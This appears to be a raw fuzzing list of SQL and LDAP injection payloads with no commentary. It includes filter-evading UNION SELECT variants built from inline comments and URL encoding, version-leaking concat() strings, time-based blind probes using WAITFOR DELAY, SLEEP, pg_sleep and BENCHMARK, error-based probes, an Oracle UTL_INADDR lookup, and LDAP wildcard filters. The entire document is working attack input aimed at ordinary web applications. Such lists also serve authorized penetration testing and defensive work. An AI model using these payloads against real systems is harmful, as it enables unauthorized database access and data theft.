''
  '
  `
  ``
  ()
  or%201=1
  >
  [id=1]
  1+un/**/ion+se/**/lect+1,2,3--
  ` /!%55NiOn/ /!%53eLEct/
%55nion(%53elect 1,2,3)– -
+union+distinct+select+
+union+distinctROW+select+
///!12345UNION SELECT///
concat(0x223e,@@version)
concat(0x273e27,version(),0x3c212d2d)
concat(0x223e3c62723e,version(),0x3c696d67207372633d22)
concat(0x223e,@@version,0x3c696d67207372633d22)
concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62​723e)
concat(0x223e3c62723e,@@version,0x3a,”BlackRose”,0x3c696d67207372633d22)
concat(‘’,@@version,’’)
///!50000UNION SELECT///
//UNION///!50000SELECT///
/!50000UniON SeLeCt/
union /!50000%53elect/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/!%55NiOn/ /!%53eLEct/
/!u%6eion/ /!se%6cect/
+un//ion+se//lect
uni%0bon+se%0blect
%2f%2funion%2f*%2fselect
union%23foo%2Fbar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/–/union/–/select/–/
union (/!/*/ SeleCT */ 1,2,3)
/!union/+/!select/
union+/!select/
//union//select//
//uNIon//sEleCt//
///*!union*////!select///
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?+un//ion+se//lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f%2funion%2f%2fselect%2f%2f
union%23foo%2Fbar%0D%0Aselect%23foo%0D%0A
/!UnIoN*/SeLecT+`
%55nion(%53elect) union%20distinct%20select union%20%64istinctRO%57%20select union%2053elect %23?%0auion%20?%23?%0aselect %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect %55nion %53eLEct u%6eion se%6cect unio%6e %73elect unio%6e%20%64istinc%74%20%73elect uni%6fn distinct%52OW s%65lect %75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7
` /!from/information_schema.columns/!where/column_name%20/!like/char(37,%20112,%2097,%20115,%20115,%2037)`
-15+and+(select 1)=(Select 0xAA[..(add about 1000 “A”)..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4….
-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4….
1' OR NOT 2470=2470-- Ontu
' WAITFOR DELAY '0:0:5'--
';WAITFOR DELAY '0:0:5'-- 
')) or sleep(5)='
;waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
";waitfor delay '0:0:__TIME__'--
1) or pg_sleep(__TIME__)--
||(elt(-3+5,bin(15),ord(10),hex(char(45))))
"hi"") or (""a""=""a"
" or sleep(__TIME__)#
pg_sleep(__TIME__)--
*(|(objectclass=*))
declare @q nvarchar (200) 0x730065006c00650063 
3.10E+17
'%20or%20''='
'%20or%20'x'='x
')%20or%20('x'='x
/(SELECT%20(CASE%20WHEN%20(9967=9967)%20THEN%2010%20ELSE%20(SELECT%204619%20UNION%20SELECT%207284)%20END))
/10%20AND%20(SELECT%201030%20FROM(SELECT%20COUNT(*),CONCAT(0x7176717071,(SELECT%20(ELT(1030=1030,1))),0x7176717871,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)
/10%20AND%20(SELECT%204814%20FROM%20(SELECT(SLEEP(5)))jQqq)
/10%20UNION%20ALL%20SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176717071,0x6a70787a43525a4e7563646951517a696944624150465361476541455147435a536c775142586976,0x7176717871)-- -
/+or+sleep(0.2)%23)
/-1;%20waitfor%20delay%20'0:0:10'%20--%20
/if(now()=sysdate()%2Csleep(15)%2C0)
/Be7BtCuD'))%20OR%20335=(SELECT%20335%20FROM%20PG_SLEEP(15))--
null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4….
/*AND/*1=1/**/
  ()
  or%201=1
  >
  [id=1]
  X)'--
 '1'-AND-1=x
 |1|AND|1|=|x|
 or 0=0 #"
 /%7C
 *(|(mail=*))
/**/UNION/**/SELECT/**/NULL,banner/**/FROM/**/v$version--
/**/AND/**/1=UTL_INADDR.get_host_name('10.0.0.1')--
1'%0a--
-1'AND'1'='1
1-/*!(BENCHMARK(5000000,MD5(1)))*/
1-/*!(1+1-2)*/
1-/*!(1+1-1)*/
1' AND (SELECT 1)=1 AND (guid)LIKE(0x253230303732302d6d776225)-
')%20\*!(1+1-2)*/%20'1'='1-
